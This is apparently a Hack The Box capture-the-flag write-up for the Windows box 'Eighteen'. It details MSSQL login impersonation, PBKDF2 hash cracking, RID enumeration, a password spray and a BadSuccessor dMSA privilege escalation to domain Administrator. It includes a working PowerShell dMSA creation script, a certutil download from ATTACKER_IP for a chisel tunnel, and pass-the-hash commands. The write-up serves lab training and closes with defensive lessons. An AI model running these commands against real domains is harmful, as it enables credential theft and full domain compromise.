hackthebox Easy

Eighteen

active-directory mssql impersonation pbkdf2 password-spray winrm badsuccessor dmsa cve-2025-53779 kerberos chisel pass-the-hash

Overview

Eighteen is an Easy Windows box running a Windows Server 2025 domain controller with MSSQL, IIS, and WinRM exposed. The attack chain starts with given MSSQL credentials for kevin, who can impersonate the appdev login to access the financial_planner database containing a PBKDF2-hashed admin password. After cracking the hash, RID brute-forcing via MSSQL reveals domain users, and password spraying finds that adam.scott reuses the cracked password for WinRM access. Privilege escalation exploits BadSuccessor (CVE-2025-53779), a dMSA abuse vulnerability in Windows Server 2025, to impersonate the domain Administrator and extract their NTLM hash via secretsdump.

Key Attack Chain:

  1. MSSQL login as kevin, impersonate appdev via EXECUTE AS LOGIN
  2. Dump financial_planner.users table to get admin’s PBKDF2 hash
  3. Crack PBKDF2 hash (hashcat mode 10900) to recover iloveyou1
  4. RID brute force via MSSQL to enumerate domain users
  5. Password spray iloveyou1 against all users – adam.scott works for WinRM
  6. BadSuccessor: create dMSA targeting Administrator, extract NTLM hash via Kerberos delegation
  7. Pass-the-hash as Administrator for root flag

Enumeration

Nmap Scan

1

nmap -sC -sV -T4 10.129.5.252

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • Domain: eighteen.htb / DC01.eighteen.htb
  • OS: Windows Server 2025 Datacenter (Build 26100)
  • Clock skew: +7 hours (important for Kerberos)

Port 80 serves a financial planning web app with registration and login. The web app itself is not directly exploitable.

Foothold

MSSQL Enumeration

Connect to MSSQL with the given credentials kevin:iNa2we6haRj2gaw!:

1

impacket-mssqlclient 'kevin:iNa2we6haRj2gaw!@10.129.5.252'

Kevin has guest-level access. Check for impersonation privileges:

1

nxc mssql 10.129.5.252 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M mssql_priv

Kevin can impersonate appdev:

1
2
3
4

EXECUTE AS LOGIN = 'appdev';
SELECT SYSTEM_USER;  -- confirms: appdev
use financial_planner;
SELECT * FROM users;

id    full_name  username  email               password_hash                                                                      is_admin
1002  admin      admin     admin@eighteen.htb  pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b...   1

Cracking the PBKDF2 Hash

Convert the Werkzeug PBKDF2 hash to hashcat format:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

#!/usr/bin/env python3
# pbkdf2-to-hashcat.py
import base64, sys
h = sys.argv[1]
parts = h.split('$')
iterations = parts[0].split(':')[-1]
salt = parts[1]
sha = parts[2]
salt_b64 = base64.b64encode(salt.encode()).decode()
hash_b64 = base64.b64encode(bytes.fromhex(sha)).decode()
print(f'sha256:{iterations}:{salt_b64}:{hash_b64}')

1
2

python3 pbkdf2-to-hashcat.py 'pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133' > hsh
hashcat -m 10900 hsh /usr/share/wordlists/rockyou.txt

sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:iloveyou1

RID Brute Force

Enumerate domain users via MSSQL RID brute force:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

-- Run as kevin (no impersonation needed)
DECLARE @i INT = 500;
DECLARE @result TABLE (rid INT, name NVARCHAR(256));
WHILE @i < 5000
BEGIN
    DECLARE @sid VARBINARY(MAX) = SUSER_SID('EIGHTEEN\Administrator');
    SET @sid = SUBSTRING(@sid, 1, DATALENGTH(@sid) - 4) + CAST(REVERSE(CAST(@i AS BINARY(4))) AS VARBINARY(4));
    DECLARE @name NVARCHAR(256) = SUSER_SNAME(@sid);
    IF @name IS NOT NULL AND @name != ''
        INSERT INTO @result VALUES (@i, @name);
    SET @i = @i + 1;
END
SELECT * FROM @result ORDER BY rid;

Key users discovered:

  • jamie.dunn (1606), jane.smith (1607), alice.jones (1608)
  • adam.scott (1609), bob.brown (1610), carol.white (1611), dave.green (1612)

Password Spray for WinRM

1

nxc winrm 10.129.5.252 -u users.txt -p 'iloveyou1' --continue-on-success

WINRM  10.129.5.252  5985  DC01  [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

User Flag

1

nxc winrm 10.129.5.252 -u adam.scott -p 'iloveyou1' -x 'type C:\Users\adam.scott\Desktop\user.txt'

Privilege Escalation

BadSuccessor (CVE-2025-53779)

The DC runs Windows Server 2025, which introduced Delegated Managed Service Accounts (dMSA). BadSuccessor abuses the msDS-ManagedAccountPrecededByLink attribute – any user who can create objects in an OU can create a dMSA that “succeeds” any account, inheriting its credentials via Kerberos.

1. Create Malicious dMSA

Via WinRM as adam.scott:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

Import-Module ActiveDirectory
$ldapPath = "LDAP://eighteen.htb/OU=Staff,DC=eighteen,DC=htb"
$parentEntry = New-Object System.DirectoryServices.DirectoryEntry($ldapPath)
$newChild = $parentEntry.Children.Add("CN=nory_dmsa", "msDS-DelegatedManagedServiceAccount")
$newChild.Properties["msDS-DelegatedMSAState"].Value = 2
$newChild.Properties["msDS-ManagedPasswordInterval"].Value = 30
[void]$newChild.Properties["dnshostname"].Add("nory_dmsa.eighteen.htb")
[void]$newChild.Properties["samaccountname"].Add("nory_dmsa$")
$newChild.Properties["msDS-SupportedEncryptionTypes"].Value = 0x1C
$newChild.Properties["userAccountControl"].Value = 0x1000
[void]$newChild.Properties["msDS-ManagedAccountPrecededByLink"].Add("CN=Administrator,CN=Users,DC=eighteen,DC=htb")

$adminSID = (Get-ADUser adam.scott).SID.Value
$rawSD = New-Object System.Security.AccessControl.RawSecurityDescriptor "O:S-1-5-32-544D:(A;;FA;;;$adminSID)"
$descriptor = New-Object byte[] $rawSD.BinaryLength
$rawSD.GetBinaryForm($descriptor, 0)
[void]$newChild.Properties["msDS-GroupMSAMembership"].Add($descriptor)
$newChild.CommitChanges()

2. Set Up Chisel SOCKS Proxy

Kerberos port (88) is firewalled externally. Use chisel to tunnel through the victim:

1
2
3
4
5
6

# Attacker
chisel server -p 8080 --reverse

# Victim (upload chisel.exe first via certutil)
certutil -urlcache -split -f http://ATTACKER_IP:9999/chisel_win C:\Users\adam.scott\chisel.exe
C:\Users\adam.scott\chisel.exe client ATTACKER_IP:8080 R:1080:socks

Configure /etc/proxychains4.conf:

strict_chain
[ProxyList]
socks5 127.0.0.1 1080

3. Extract Administrator Hash

Use getST.py with -dmsa flag through the SOCKS proxy. Note the +7h clock skew requires faketime:

1
2
3

# Get Kerberos ticket for dMSA
proxychains -q faketime '+7 hours' getST.py 'eighteen.htb/adam.scott:iloveyou1' \
  -impersonate 'nory_dmsa$' -dc-ip 10.129.5.252 -self -dmsa

Output reveals the Previous keys which contain the Administrator’s NTLM hash:

[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec

4. Secretsdump (Optional Verification)

1
2
3

export KRB5CCNAME='nory_dmsa$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache'
proxychains -q faketime '+7 hours' impacket-secretsdump -k -no-pass dc01.eighteen.htb \
  -just-dc-user Administrator -dc-ip 10.129.5.252

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::

Root Flag

1
2

nxc winrm 10.129.5.252 -u Administrator -H 0b133be956bfaddf9cea56701affddec \
  -x 'type C:\Users\Administrator\Desktop\root.txt'

Or with evil-winrm:

1

evil-winrm -u Administrator -H 0b133be956bfaddf9cea56701affddec -i 10.129.5.252

Lessons Learned

  • MSSQL impersonation opens lateral pathsEXECUTE AS LOGIN allowed kevin (guest) to access a restricted database through appdev, bypassing direct authorization checks
  • PBKDF2 doesn’t guarantee safety – Despite 600,000 iterations, the password iloveyou1 falls quickly to dictionary attacks. Strong passwords are still essential regardless of hashing algorithm
  • MSSQL RID brute forcing is powerful – Even without SMB access, MSSQL’s SUSER_SNAME() function with constructed SIDs enables complete domain user enumeration
  • Password reuse across web and AD is common – The admin web app password was reused as adam.scott’s domain password
  • BadSuccessor (CVE-2025-53779) is devastating – Any user who can create child objects in an OU can impersonate any account in the domain, including Administrator. The vulnerability is in the dMSA design of Windows Server 2025 and requires no special privileges beyond object creation
  • Firewalled Kerberos requires tunneling – When only WinRM is exposed, chisel SOCKS proxying enables full Kerberos exploitation from the attacker machine